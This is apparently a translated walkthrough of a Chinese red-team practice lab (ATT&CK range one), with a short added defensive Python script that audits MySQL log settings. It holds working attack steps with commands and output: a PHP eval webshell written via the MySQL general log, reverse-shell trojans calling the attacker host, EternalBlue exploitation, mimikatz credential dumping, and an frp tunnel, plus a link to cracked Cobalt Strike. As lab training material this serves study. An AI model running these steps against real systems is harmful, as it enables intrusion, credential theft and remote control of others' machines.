# Environment setup

http://www.yongsheng.site/2021/03/22/ATT&CK 红队评估实战靶场(一)/

https://www.bilibili.com/video/BV13W4y1t7qB?spm_id_from=333.999.0.0&vd_source=4b2ca0a221ea211ecd7881292e3ad4c

Open the archive directly in VMware.

Network topology

win7 and win

Password: Asd123456789

win8: Asd1234567890

As the video explains, first change the NAT subnet to 52, and change the DHCP range to 52 as well.

Then add a bridged network adapter to win7.

Start phpstudy.

Access it from the external network.

# Information gathering

Visit the PHP web service on win7:

It is a PHP probe page, so test for a MySQL weak password.

Scan with Nmap to see which ports are open.

Scan for the admin panel with dirsearch.

phpmyadmin is found.

# Exploitation: getshell

# Getshell via the admin panel

Go to /phpmyadmin.

Log in successfully with the default credentials root / root.

Check the value of secure_file_priv:

```sql
SELECT @@global.secure_file_priv;
```

This shows that we cannot write a file to disk to getshell.

Try enabling the general log to getshell instead:

```sql
SELECT @@global.secure_file_priv;
show variables like '%general%';
```

We can see the feature is off, and the log file path is echoed back.

Try enabling it and changing the path.

Write the one-liner:

```sql
set global general_log='on';
set global general_log_file='C:/Users/liukaifeng01/Desktop/WWW/shell.php';
select "<?php eval($_POST[1]);?>";
```
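As an added defensive example (not from the original post), a small Python audit of the MySQL settings that make this log-based getshell possible: secure_file_priv, general_log, and where general_log_file points relative to the web root. The variable snapshot and the web-root path are constructed to match the values used above; in practice you would feed it the rows returned by SHOW VARIABLES.

```python
"""Audit MySQL globals that can turn the general query log into a web-served file.
Added example, not from the original post; the snapshot below is constructed."""
import posixpath

# Constructed snapshot of SHOW VARIABLES after the steps on this page
# (SHOW VARIABLES renders a disabled secure_file_priv as the string NULL).
SAMPLE_VARS = {
    "secure_file_priv": "NULL",
    "general_log": "ON",
    "general_log_file": "C:/Users/liukaifeng01/Desktop/WWW/shell.php",
}
# Document root of the phpstudy site, as used on this page.
SAMPLE_WEB_ROOTS = [r"C:\Users\liukaifeng01\Desktop\WWW"]
# Extensions the web server would execute rather than serve as text.
SCRIPT_EXTENSIONS = {".php", ".phtml", ".php5", ".asp", ".aspx", ".jsp"}


def normalize(path: str) -> str:
    """Lower-case and forward-slash a Windows or POSIX path for comparison."""
    return posixpath.normpath(path.replace("\\", "/")).lower().rstrip("/")


def is_under(path: str, root: str) -> bool:
    """True if `path` is `root` itself or lies somewhere below it."""
    p, r = normalize(path), normalize(root)
    return p == r or p.startswith(r + "/")


def audit(variables: dict, web_roots) -> list:
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings = []
    sfp = variables.get("secure_file_priv", "")
    if sfp == "":
        # Empty string means SELECT ... INTO OUTFILE may write anywhere mysqld can.
        findings.append("secure_file_priv is empty: file export is unrestricted")
    elif sfp.upper() != "NULL":
        for root in web_roots:
            if is_under(sfp, root) or is_under(root, sfp):
                findings.append(f"secure_file_priv={sfp} overlaps web root {root}")
    if variables.get("general_log", "OFF").upper() == "ON":
        log_file = variables.get("general_log_file", "")
        ext = posixpath.splitext(normalize(log_file))[1]
        if ext in SCRIPT_EXTENSIONS:
            findings.append(f"general_log_file has a script extension: {log_file}")
        for root in web_roots:
            if is_under(log_file, root):
                findings.append(f"general_log_file is inside web root {root}: {log_file}")
    return findings


if __name__ == "__main__":
    for line in audit(SAMPLE_VARS, SAMPLE_WEB_ROOTS):
        print("[!]", line)
```

A hardened server (secure_file_priv = NULL, general_log = OFF, or a log file under the data directory with a .log extension) produces no findings.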

Connect with AntSword:

# yxcms GetShell

There is also a newyxcms directory in there, so we can guess there is a yxcms system as well.

Then look up its vulnerability and log in.

https://forum.butian.net/share/164

Edit its info.php.

Then visit

http://172.29.31.131/yxcms/protected/apps/default/view/default/info.php?1=phpinfo();

# Using AntSword

Check identity with AntSword:

Add a user:

```
net user miku hongrisec@2020 /add
```

(This adds a user named miku with the password hongrisec@2020.)

Check the miku user.

Turn off the firewall:

# Taking control of win

# Getting access

# msf trojan

Bring the host online in msf:

```
msfdb run
```

Generate the trojan:

```
msf6 > use payload/windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) >
msf6 payload(windows/x64/meterpreter/reverse_tcp) > ifconfig
[*] exec: ifconfig
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set LHOST 172.29.31.
LHOST => 172.29.31.
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set LPORT 5555
LPORT => 5555
msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -f exe -o exp.exe
[*] Writing 7168 bytes to exp.exe...
```

Then upload the trojan.

Then listen in kali:

```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 0.0.0.
LHOST => 0.0.0.
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 0.0.0.0:5555
```

The session is received successfully.

# Generating a trojan with msfvenom

Use msfvenom to generate the payload file, then upload it to win with AntSword:

```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.29.31.62 LPORT=5555 -f exe > shell.exe
```

Upload the trojan with AntSword.

Run the trojan:

msf starts listening.

# SMB ms17_010 (bind)

There are bind (forward) and reverse payloads.

Bind: set the target's IP as rhost.

Reverse: set your own attack machine's IP and port as lhost and lport.

Then set the payload to bind:

```
use exploit/windows/smb/ms17_010_eternalblue
```

Then set rhost and rport:

```
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.239.
set rport 445
```

Success.

When msf misbehaves, you can clear its cache:

```
msfdb reinit
msfdb run
```

# Information gathering

First switch the console to UTF-8 encoding, then look at the domain information:

```
sysinfo
getuid      (shows we have Administrator privileges)
getsystem   (get SYSTEM privileges)
C:\phpStudy\WWW>chcp 65001
chcp 65001
Active code page: 65001
```

Then find the domain controller's IP:

```
C:\phpStudy\WWW>net config workstation
net config workstation
Computer name                        \\STU1
Full Computer name                   stu1.god.org      // god.org is the domain
User name                            Administrator

Workstation active on
        NetBT_Tcpip_{55ECD929-FBB2-4D96-B43D-8FFEB14A169F} (000C2910F4D7)
        NetBT_Tcpip_{9666BA36-B530-42B9-ABE4-E02828813CB4} (000C2910F4CD)
        NetBT_Tcpip_{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C} (02004C4F4F50)

Software version                     Windows 7 Professional

Workstation domain                   GOD
Workstation Domain DNS Name          god.org
Logon domain                         GOD

COM Open Timeout (sec)               0
COM Send Count (byte)                16
COM Send Timeout (msec)              250
The command completed successfully.

C:\phpStudy\WWW>net view
ping STU1net view
Ping request could not find host STU1net. Please check the name and try again.
C:\phpStudy\WWW>net view
net view
Server Name            Remark

-------------------------------------------------------------------------------
\\OWA
\\ROOT-TVI862UBEH
\\STU1
The command completed successfully.

C:\phpStudy\WWW>ping ROOT-TVI862UBEH
ping ROOT-TVI862UBEH

Pinging ROOT-TVI862UBEH [192.168.52.141] with 32 bytes of data:
Reply from 192.168.52.141: bytes=32 time=1ms TTL=128
Reply from 192.168.52.141: bytes=32 time<1ms TTL=128
Reply from 192.168.52.141: bytes=32 time<1ms TTL=128
Reply from 192.168.52.141: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.52.141:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 1ms, Average = 0ms

C:\phpStudy\WWW>ping OWA
ping OWA

Pinging OWA.localdomain [192.168.52.138] with 32 bytes of data:
Reply from 192.168.52.138: bytes=32 time<1ms TTL=128
Reply from 192.168.52.138: bytes=32 time=20ms TTL=128
Reply from 192.168.52.138: bytes=32 time<1ms TTL=128
Reply from 192.168.52.138: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.52.138:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 20ms, Average = 5ms
```

Now we know the IPs of the hosts in the domain.

# Host password collection

Hashdump: view the users' password hashes.

Mimikatz: dump plaintext passwords.

PS: the mimikatz module has been merged into the kiwi module.

```
load kiwi
```

The creds_all command gets the credentials directly:

OWA: 192.168.52.138 (domain controller)

ROOT-TVI862UBEH: 192.168.52.141 (client)

# Taking the domain controller

Then list processes with ps and steal a token.

Here we steal httpd's token to get administrator privileges (even though we were already administrator automatically).

```
meterpreter > migrate 2840
[*] Migrating from 4300 to 2840...
[*] Migration completed successfully.
meterpreter > getuid
Server username: GOD\Administrator
```

# Lateral movement

# win2008

# Adding a route

No route had been added here yet, so add one:

```
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions

Active sessions
===============

  Id  Name  Type                     Information                Connection
  --  ----  ----                     -----------                ----------
  2         meterpreter x64/windows  GOD\Administrator @ STU1   172.29.31.62:5555 -> 172.29.31.66:45246 (172.29.31.66)

msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions 2
[*] Starting interaction with 2...
meterpreter > run post/multi/manage/autoroute
[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows
[*] Running module against STU1
[*] Searching for subnets to autoroute.
[+] Route added to subnet 169.254.0.0/255.255.0.0 from host's routing table.
[+] Route added to subnet 172.29.31.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.52.0/255.255.255.0 from host's routing table.
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(windows/smb/ms17_010_eternalblue) >
```

# frp proxy

https://www.freebuf.com/articles/network/271719.html

https://blog.csdn.net/weixin_42109829/article/details/122554815?ops_request_misc=&request_id=&biz_id=102&utm_term=frp 代理失败 & utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduweb~default-1-122554815.142v42pc_rank_34_1,185v2control&spm=1018.2226.3001.4187

# frps.ini

The server side, running on kali; it only needs the port the client connects to:

```ini
[common]
bind_port = 7000
```

# frpc.ini

The client side, uploaded to win7; it connects back to kali on port 7000 and publishes a socks5 proxy on the server's port 1579:

```ini
[common]
server_addr = 172.29.31.62
server_port = 7000

[socks_proxy]
type = tcp
remote_port = 1579
plugin = socks5
```

Upload the frpc client:

```
meterpreter > upload frpc.exe
[*] uploading  : /home/kali/Desktop/frpc.exe -> frpc.exe
[*] Uploaded 8.00 MiB of 10.62 MiB (75.3%): /home/kali/Desktop/frpc.exe -> frpc.exe
[*] Uploaded 10.62 MiB of 10.62 MiB (100.0%): /home/kali/Desktop/frpc.exe -> frpc.exe
[*] uploaded   : /home/kali/Desktop/frpc.exe -> frpc.exe
meterpreter > upload frpc.ini
[*] uploading  : /home/kali/Desktop/frpc.ini -> frpc.ini
[*] Uploaded 128.00 B of 128.00 B (100.0%): /home/kali/Desktop/frpc.ini -> frpc.ini
[*] uploaded   : /home/kali/Desktop/frpc.ini -> frpc.ini
```

Start it once it is configured.

From this point the tunnel stays up even if we exit the session.

# EternalBlue

```
msf6 exploit(windows/smb/psexec) > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 exploit(windows/smb/psexec) > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf6 exploit(multi/handler) > set Proxies socks5:127.0.0.1:6000
Proxies => socks5:127.0.0.1:6000

msf6 exploit(multi/handler) > setg ReverseAllowProxy true
ReverseAllowProxy => true
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[-] Handler failed to bind to 172.29.31.62:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] 192.168.52.138:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.52.138:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.52.138:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.52.138:445 - The target is vulnerable.
[*] 192.168.52.138:445 - Connecting to target for exploitation.
[+] 192.168.52.138:445 - Connection established for exploitation.
[+] 192.168.52.138:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.52.138:445 - CORE raw buffer dump (53 bytes)
[*] 192.168.52.138:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.52.138:445 - 0x00000010  30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65  008 R2 Datacente
[*] 192.168.52.138:445 - 0x00000020  72 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50  r 7601 Service P
[*] 192.168.52.138:445 - 0x00000030  61 63 6b 20 31                                   ack 1
[+] 192.168.52.138:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.52.138:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.52.138:445 - Sending all but last fragment of exploit packet
[*] 192.168.52.138:445 - Starting non-paged pool grooming
[+] 192.168.52.138:445 - Sending SMBv2 buffers
[+] 192.168.52.138:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.52.138:445 - Sending final SMBv2 buffers.
[*] 192.168.52.138:445 - Sending last fragment of exploit packet!
[*] 192.168.52.138:445 - Receiving response from exploit packet
[+] 192.168.52.138:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.52.138:445 - Sending egg to corrupted connection.
[*] 192.168.52.138:445 - Triggering free of corrupted buffer.
[-] 192.168.52.138:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.52.138:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.52.138:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.52.138:445 - Connecting to target for exploitation.
[+] 192.168.52.138:445 - Connection established for exploitation.
[+] 192.168.52.138:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.52.138:445 - CORE raw buffer dump (53 bytes)
[*] 192.168.52.138:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.52.138:445 - 0x00000010  30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65  008 R2 Datacente
[*] 192.168.52.138:445 - 0x00000020  72 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50  r 7601 Service P
[*] 192.168.52.138:445 - 0x00000030  61 63 6b 20 31                                   ack 1
[+] 192.168.52.138:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.52.138:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.52.138:445 - Sending all but last fragment of exploit packet
[*] 192.168.52.138:445 - Starting non-paged pool grooming
[+] 192.168.52.138:445 - Sending SMBv2 buffers
[+] 192.168.52.138:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.52.138:445 - Sending final SMBv2 buffers.
[*] 192.168.52.138:445 - Sending last fragment of exploit packet!
[*] 192.168.52.138:445 - Receiving response from exploit packet
[+] 192.168.52.138:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.52.138:445 - Sending egg to corrupted connection.
[*] 192.168.52.138:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 172.29.31.177
[*] Meterpreter session 2 opened (172.29.31.62:4444 -> 172.29.31.177:52520) at 2022-08-29 23:05:36 -0400
[+] 192.168.52.138:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.52.138:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.52.138:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > ipconfig
```

Successfully online.

# win2003

# Remote desktop

Use the EternalBlue variant that works against the 32-bit version to modify the registry and enable Remote Desktop.

```
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(windows/smb/ms17_010_eternalblue) > search msf17-010
[-] No results from search
msf6 exploit(windows/smb/ms17_010_eternalblue) > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 exploit(windows/smb/ms17_010_eternalblue) > use 2
msf6 auxiliary(admin/smb/ms17_010_command) > set RHOSTS 192.168.52.141
RHOSTS => 192.168.52.141
msf6 auxiliary(admin/smb/ms17_010_command) > set COMMAND 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t reg_dword /d 00000000 /f'
COMMAND => REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t reg_dword /d 00000000 /f
```

Then modify the proxychains configuration file and turn it on (this did not work for me).

# Cobalt Strike

https://blog.csdn.net/weixin_47830774/article/details/121885329?ops_request_misc=%7B%22request%5Fid%22%3A%22166183325216780357293152%22%2C%22scm%22%3A%2220140713.130102334..%22%7D&request_id=166183325216780357293152&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2alltop_click~default-1-121885329-null-null.142v42pc_rank_34_1,185v2control&utm_term=cobalt%20strike%E5%AE%89%E8%A3%85&spm=1018.2226.3001.4187

# Download address

https://gitee.com/ssooking/cobaltstrike-cracked/repository/archive/master.zip

```
./teamserver 172.29.31.62 12345678
```

Then, in another terminal:

```
./start.sh
```

```
msf6 auxiliary(admin/smb/ms17_010_command) > exploit
[*] 192.168.52.141:445 - Target OS: Windows Server 2003 3790
[*] 192.168.52.141:445 - Filling barrel with fish... done
[*] 192.168.52.141:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.52.141:445 - [*] Preparing dynamite...
[*] 192.168.52.141:445 - Trying stick 1 (x64)...Miss
[*] 192.168.52.141:445 - [*] Trying stick 2 (x86)...Boom!
[*] 192.168.52.141:445 - [+] Successfully Leaked Transaction!
[*] 192.168.52.141:445 - [+] Successfully caught Fish-in-a-barrel
[*] 192.168.52.141:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.52.141:445 - Reading from CONNECTION struct at: 0x8d24c4d0
[*] 192.168.52.141:445 - Built a write-what-where primitive...
[+] 192.168.52.141:445 - Overwrite complete... SYSTEM session obtained!
[+] 192.168.52.141:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.52.141:445 - Getting the command output...
[*] 192.168.52.141:445 - Command finished with no output
[*] 192.168.52.141:445 - Executing cleanup...
[+] 192.168.52.141:445 - Cleanup was successful
[+] 192.168.52.141:445 - Command completed successfully!
[*] 192.168.52.141:445 - Output for "REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t reg_dword /d 00000000 /f":
[*] 192.168.52.141:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/smb/ms17_010_command) >
```

Set up a listener.

Click add and just fill in the kali IP and port.

Then generate the backdoor.

Choose the Listener.

Generate the exe, upload it to the 138 target, and run it; the beacon comes back.

Choose interact.

Then run net view.

Click upward to discover the hosts.

Then do the lateral movement.

Select it.

Successfully online.
